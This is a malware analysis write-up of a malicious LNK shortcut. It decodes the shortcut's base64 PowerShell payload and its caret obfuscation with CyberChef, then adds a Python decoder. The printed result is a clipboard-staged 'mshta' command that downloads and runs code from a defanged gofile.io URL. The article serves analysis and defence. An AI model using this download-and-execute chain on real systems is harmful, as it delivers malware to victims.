Analysis Malicious LNK Part 2

By Diyar Saadi | WIN32 | July 15, 2025

In this article we start the second part of analyzing a malicious LNK file and try to analyze its code in the simplest way.

Sample Link: https://bazaar.abuse.ch/sample/c07eddc933da41c6569168e02938857fc3964b36b3a95bd5df897d5a4482c961/

Malicious LNK Screenshot:

Malicious LNK Structure Analysis:

1- Target: appears to contain a long PowerShell command line that tries to execute a stripped (encoded) malicious PowerShell payload.

Malicious PowerShell code analysis (inside the Target section of the LNK file, see the image above):

1- Malicious PowerShell command line:
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E 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

2- The malware developer tries to execute an encoded malicious PowerShell payload through the -E switch:
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -E

3- Base64-encoded malicious code:
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

Decoding the Base64-encoded malicious PowerShell code:

1- Open CyberChef in your web browser.
2- Paste the encoded malicious base64 PowerShell code.
3- From the Operations field select From Base64 (or double-click on it).
4- Then from the Operations field select Remove null bytes.

If we look at the output after decoding, it still looks obfuscated with symbols, so we need to deobfuscate this symbolic obfuscation method as well.

Decoding the symbolically obfuscated code:

1- Do not clear your recent operations from decoding the base64-encoded PowerShell code.
2- Again in Operations search for the Find/Replace operation.
3- In Find paste this ( ^ ) and keep Replace empty.
4- You can also deobfuscate manually.

Result:
scb 'mshta https:[//]store6.gofile].io/]download/direct/b08ea796-2c0b-412f-bd88-7b1c65e36b9e/Verlegung[.mp4']; iex (gcb)
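As an added example (not part of the original article), here is a small Python decoder that performs the same steps as the CyberChef recipe above offline: it decodes a powershell -E payload as base64 over UTF-16LE (which is where the null bytes come from), strips the ^ characters, and defangs the URLs found in the result. The sample payload and its URL are constructed placeholders, not the real sample's data.

```python
import base64
import re

# Constructed sample (not the real payload from the article): the same
# command shape as the decoded result, with a placeholder URL, caret-obfuscated
# and then encoded the way `powershell -E` expects (base64 over UTF-16LE).
SAMPLE_PLAIN = "s^cb 'm^shta https://example.invalid/placeholder.mp4'; i^ex (g^cb)"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAIN.encode("utf-16-le")).decode("ascii")

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of `powershell -E` / `-EncodedCommand`.

    The payload is base64 over UTF-16LE text. Decoding as UTF-16LE is the
    robust equivalent of CyberChef's "From Base64" + "Remove null bytes"
    recipe, which only gives correct output when the script is pure ASCII.
    """
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        # Odd length: not a clean UTF-16LE stream, fall back to null stripping.
        return raw.replace(b"\x00", b"").decode("latin-1")
    return raw.decode("utf-16-le")


def strip_caret_obfuscation(cmd: str) -> str:
    """Undo the '^' insertion that splits keywords (the article's Find/Replace step)."""
    return cmd.replace("^", "")


def defang(url: str) -> str:
    """Render a URL non-clickable for a report (hxxp, [.])."""
    url = re.sub(r"(?i)^http", "hxxp", url)
    return url.replace(".", "[.]")


def extract_urls(cmd: str) -> list[str]:
    """Pull the download URLs out of a deobfuscated command, defanged."""
    return [defang(u) for u in URL_RE.findall(cmd)]


def analyze(b64: str) -> dict:
    """Full pipeline: decode, strip carets, collect indicators."""
    decoded = decode_encoded_command(b64)
    clean = strip_caret_obfuscation(decoded)
    # In the article's result, scb/gcb are the Set-Clipboard/Get-Clipboard
    # aliases: the mshta command is staged in the clipboard and run via iex.
    return {"decoded": decoded, "deobfuscated": clean, "urls": extract_urls(clean)}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_ENCODED).items():
        print(f"{key}: {value}")
```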